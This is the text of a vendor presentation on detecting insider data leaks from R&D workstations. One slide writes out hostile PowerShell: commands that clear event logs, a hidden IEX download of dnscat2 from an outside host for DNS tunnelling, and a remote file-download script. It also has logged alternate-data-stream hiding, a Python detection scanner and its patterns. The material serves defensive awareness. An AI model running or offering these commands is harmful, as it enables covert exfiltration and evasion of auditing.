Confronting Insider Threats Head-On: Is the Company the Victim, or Has the Employee Been Hacked? FineArt - Victor Chen


Page 1

Confronting insider threats head-on: is the company the victim, or has the employee been hacked?

FineArt - Victor Chen

Page 2

Cyber-security risks remain in the global Top 5, with data leakage ranked above cyber attacks (The Global Risks Report 2019, 14th Edition)

http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf

[Figure: "Top 5 Global Risks in Terms of Likelihood" and "The Global Risks Landscape 2019", plotted by likelihood against impact]

Page 3

The six fields of greatest interest to intelligence collectors

2018 Foreign Economic Espionage in Cyberspace report:
https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf

Industry Priority Sectors / Technologies

Energy / Alternative Energy
• Advanced pressurized water reactor and high-temperature, gas-cooled nuclear power stations
• Biofuels
• Energy-efficient industries
• Oil, gas, and coalbed methane development, including fracking
• Smart grids
• Solar energy technology
• Wind turbines

Biotechnology
• Advanced medical devices
• Biomanufacturing and chemical manufacturing
• Biomaterials
• Biopharmaceuticals
• Genetically modified organisms
• Infectious disease treatment
• New vaccines and drugs

Defense
• Aerospace & aeronautic systems
• Armaments
• Marine systems
• Radar
• Optics

Environmental Protection
• Batteries
• Energy-efficient appliances
• Green building materials
• Hybrid and electric cars
• Waste management
• Water/air pollution control

High-end Manufacturing
• 3D printing
• Advanced robotics
• Aircraft engines
• Aviation maintenance and service sectors
• Civilian aircraft
• Electric motors
• Foundational manufacturing equipment
• High-end computer numerically controlled machines
• High-performance composite materials
• High-performance sealing materials
• Integrated circuit manufacturing equipment and assembly technology
• Space infrastructure and exploration technology
• Synthetic rubber

Information and Communications Technology
• Artificial intelligence
• Big data analysis
• Core electronics industries
• E-commerce services
• Foundational software products
• High-end computer chips
• Internet of Things
• Network equipment
• Next-generation broadband wireless communications networks
• Quantum computing and communications
• Rare-earth materials

Page 4

The R&D department is the lifeblood of the enterprise, yet it is the hardest to manage

Page 5

The R&D engineer's working environment (diagram labels):
• JTAG and development boards
• Servers (data / DB)
• IDE application and source code
• RJ-45
• HDL tools, simulator, in-circuit test, CAx / EDA tools, layout tools / PCB
• DB, SVN, file server, test machine
• R&D engineer

Page 6

SVS + SVT cover protection of the tools used in R&D development

• System & DLL: system calls, output files
• Network API: download / upload, tunnel / cloud applications, custom protocols
• CMD & Shell: CMD, PowerShell scripts, running executables (EXE)
• Hardware: connecting to hardware devices
• Also covered: third-party application screen / video capture, print-to-image, pipe processes (IPC)

Diagram labels: IDE application, R&D, key verification, screen capture

Page 7

SVS + SVT provide complete protection of R&D intellectual property

R&D project development PC:
• Prohibited / Controlled: many kinds of operation can be restricted, such as printing, PrtScr, IPC and Ctrl-C + Ctrl-V (controlled)
• SVT allowed: SVN and development boards remain usable as normal
• The number of characters that can be pasted out can be limited

Page 8

Demo 1: Protecting Visual Studio output, with system-level defense

Files written and saved from Visual Studio are protected the moment they are stored.

Visual Studio policy defense: Prohibited Call System

Defense and control can be tailored to the specialised tools of each industry, ensuring that intellectual assets do not leak.

Page 9

Risks in the command-line environment: how much do security and audit teams know?

Page 10

IT security and audit should understand the applications used by R&D units (the same four categories as on Page 6: System & DLL, Network API, CMD & Shell, Hardware)


Page 11

Analysis of the CMD and PowerShell environment

• OS default functions & applications: Cmd.exe, Windows PowerShell, PowerShell ISE
• IDE call commands: call cmd.exe, call PowerShell, call exe
• Third-party applications: ConEmu, PSReadLine, PSGet, Chocolatey, Babun (optional), Cmder, Git Bash by MinGW & MinTTY, WSL Ubuntu on Windows, Cygwin, Xshell, Console2, PowerShell ISE, PowerShell, Dell PowerGUI, SAPIEN PowerShell Studio, AWS Tools for PowerShell, Adam Driscoll's PowerShell, PowerShell Web Access, Master-PowerShell, VMware vSphere PowerCLI
• SDK commands

SVS / SVT coverage: cmd trace logging, SVS secure disk, software access control, process logging, network behaviour logging, SVT encrypted tunnel

Page 12

Small details show why command trace logging matters

Clear all event logs:
Clear-EventLog -LogName System
Clear-EventLog -LogName Security
Clear-EventLog -LogName Application

DNS tunnel with PowerShell (dnscat2.ps1):
powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

PowerShell dodge (launch options):
-WindowStyle hidden / -w hidden
-Exec Bypass
-Command / -c
-EncodedCommand / -e / -Enc
-Nop / -NoProfile

Three ways to download files with PowerShell:
1. Invoke-WebRequest
2. System.Net.WebClient: (New-Object System.Net.WebClient).DownloadFile() and (New-Object System.Net.WebClient).DownloadString()
3. Start-BitsTransfer

$url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt"
$output = "$PSScriptRoot\real.ps1"
$start_time = Get-Date
$readteam = New-Object System.Net.WebClient
$readteam.DownloadFile($url, $output)
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

Code obfuscators:
• Crunchcode (VBA)
• ScriptCryptor (VBA, JavaScript)
• CodeProtection (VBA)
• Vbad (VBA)
• Stunnix (C++, Perl, JavaScript, VBScript)
• Scripts Encryptor (HTML, JavaScript/JScript, C/C++/MFC)
• ISESteroids (PowerShell)

Page 13

Demo 2: Trace logging of every kind of command-line behaviour: Invoke-Obfuscation, and Teensy + Alternate Data Streams (ADS)

Log time | User account | Application | Command | Department | User full name | Computer name | IP | PID | Server storage time
2019/03/12 | DEMO01 | powershell.exe | Import-Module ./Invoke-Obfuscation.psd1 | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\Invoke-Obfuscation-master\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\Desktop\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\Desktop\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | dir | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\user\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | dir | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\Users\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | dir | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | copy c:\User\user\Desktop\XConsole.exe d: | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\user\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\Users\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 14196 | 2019/03/12

Log time | User account | Application | Command | Department | User full name | Computer name | IP | PID | Server storage time
2019/03/12 | DEMO01 | CMD.exe | wordpad fake.docx:AI.DOCX | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | wordpad fake.docx | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | wordpade fake.docx | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | wordpade f wordpade fake.docx | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | dir | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | DEL AI.DOCX | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | WMIC DATAFILE WHERE DRIVE='C:' AND eXTENSION='DOCX' LIST | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | E: | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | TYPE AI.DOCX>>FAKE.DOCX:AI.DOCX | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | COPY D:AI.DOCX E: | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | COPY D:FAKE.DOCX E: | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | FORMAT E: /FS:NTFS /Q /V:ads | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | cmd.exe | ipconfig | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 8708 | 2019/03/12
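As an added, defender-side example (not FineArt's code and not part of the original slides): a small Python scanner that reads rows in the same ten-column layout as the trace tables above and tags the behaviours the last two slides single out (event-log clearing, ADS stream writes, remote download primitives, hidden or encoded launch options, Invoke-Obfuscation, dnscat2, formatting a drive), then collapses hits per account and PID so a chained sequence inside one shell session stands out. The sample rows, the regexes and the http://example.invalid URL are constructed here; the host and account values mirror the slide's demo.

```python
import re
# Constructed sample rows in the same ten-column layout as the slide's command trace:
# log time | account | application | command | dept | full name | host | IP | PID | stored.
SAMPLE_TRACE = """\
2019/03/12 | DEMO01 | powershell.exe | Import-Module ./Invoke-Obfuscation.psd1 | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | cd .\\Desktop\\ | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5056 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | TYPE AI.DOCX>>FAKE.DOCX:AI.DOCX | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | dir | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | CMD.exe | FORMAT E: /FS:NTFS /Q /V:ads | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 5096 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | Clear-EventLog -LogName Security | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 7001 | 2019/03/12
2019/03/12 | DEMO01 | powershell.exe | powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')) | IT | demo01 | DESKTOP-0QTVR1U#1 | 192.168.218.1 | 7002 | 2019/03/12
"""

# Behaviours the slides single out; these regexes are this example's own, not a product ruleset.
RULES = [
    ("event-log-wipe", re.compile(r"\bClear-EventLog\b", re.I)),
    ("ads-stream", re.compile(r"\b\w+\.\w+:\w[\w.]*")),  # file.ext:stream (NTFS alternate data stream)
    ("remote-download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer|\bIEX\b|Invoke-Expression", re.I)),
    ("launch-evasion", re.compile(r"-(?:w|WindowStyle)\s+hidden|-(?:e|enc|EncodedCommand)\b|-nop\b|-NoProfile\b|-exec(?:utionPolicy)?\s+bypass", re.I)),
    ("obfuscation-tooling", re.compile(r"Invoke-Obfuscation", re.I)),
    ("dns-tunnel", re.compile(r"dnscat2", re.I)),
    ("disk-format", re.compile(r"^\s*FORMAT\s+\w:", re.I)),  # wiping the removable drive after the copy
]

def parse_trace(text):
    """Split pipe-separated trace rows into dicts; malformed lines are skipped, not guessed at."""
    keys = ["time", "account", "app", "command", "dept", "name", "host", "ip", "pid", "stored"]
    rows = []
    for line in text.splitlines():
        cols = [c.strip() for c in line.split("|")]
        if len(cols) == len(keys):
            rows.append(dict(zip(keys, cols)))
    return rows

def scan_trace(text):
    """Return the rows whose command column matches at least one rule, with the matching tags."""
    hits = []
    for row in parse_trace(text):
        tags = [name for name, rx in RULES if rx.search(row["command"])]
        if tags:
            hits.append({**row, "tags": tags})
    return hits

def sessions(hits):
    """Collapse hits per (account, PID): an ADS write followed by a format in one shell stands out."""
    out = {}
    for h in hits:
        out.setdefault((h["account"], h["pid"]), set()).update(h["tags"])
    return out
```

Only the command column is matched, so hostnames and IPs in the other columns cannot trigger the ADS rule; feed `scan_trace` the real trace export in the same column order to tag a live log.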

Page 14

Internal network activity: does it pose a security risk?

Page 15

Analysing the enterprise network architecture

Enterprise network types:
1. External network services blocked
2. External network services partially open (physical isolation)
3. External network services open

External network services: external DNS, official website, external mail
Internal network services: internal DNS, executive information systems, internal mail, other

Security protection and network architecture: firewalls of every type, VPN, cloud architecture, data warehouse, endpoint devices, branch-office network architecture, external devices, unattended devices, devices taken on business trips, mobile devices, VoIP, WiFi, SVN, CRM, ERP

Page 16

Endpoint network activity: finding the risk

Dimensions of observation (who, where, what, which, when):
• Role: 1. employee, 2. hacker, 3. OS, 4. process
• IP / Domain: Internet, Intranet, Localhost; source / destination; whitelist, blacklist, risk targets, watch list
• Channel: Normal, Proxy, Tunnel, SVT
• Port: whitelist, blacklist, alert ports
• Protocol: TCP, UDP, DNS, other custom protocols
• Action: copy / delete, rename / duplicate, move files; upload files, paste text, drag files
• Software: IM, FTP, P2P, TorNet
• Interested: file size, file count, frequency rules, file changes, file name, file hash
• Time: working hours, after hours, midnight

Internal network services: internal DNS, executive information systems, internal mail, data warehouse, endpoint devices, SVN, CRM, ERP

Page 17

Takeafile & OnionShare 2.0: defense and network logging
• Block all dragging of files into the browser
• Prohibit application execution & block dragging files into the browser
• Log network connection behaviour whose destination is the onion (Tor) network
• Log network connection behaviour (UDP)

https://takeafile.com/

Browse date | User account | IP | URL | Browser name
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini | onionshare-gui.exe
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/favicon.ico | onionshare-gui.exe
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/css/style.css | onionshare-gui.exe
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini/download | onionshare-gui.exe
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/web_file.png | onionshare-gui.exe
2019/03/12 15:54 | DEMO01 | 192.168.218.1 | http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/logo.png | onionshare-gui.exe

Time | Source | Destination | Protocol | Length | Info
5.154527 | 192.168.1.188 | 192.168.1.170 | DTLSv1.2 | 1279 | Application Data
5.154641 | 192.168.1.188 | 192.168.1.170 | DTLSv1.2 | 1279 | Application Data
5.154648 | 192.168.1.170 | 192.168.1.188 | DTLSv1.2 | 107 | Application Data
5.154648 | 192.168.1.170 | 192.168.1.188 | DTLSv1.2 | 107 | Application Data
5.154649 | 192.168.1.170 | 192.168.1.188 | DTLSv1.2 | 107 | Application Data
5.154703 | 192.168.1.188 | 192.168.1.170 | DTLSv1.2 | 1279 | Application Data

Page 18

Enterprise data-leak prevention: for security, look to FineArt.

www.fineart-tech.com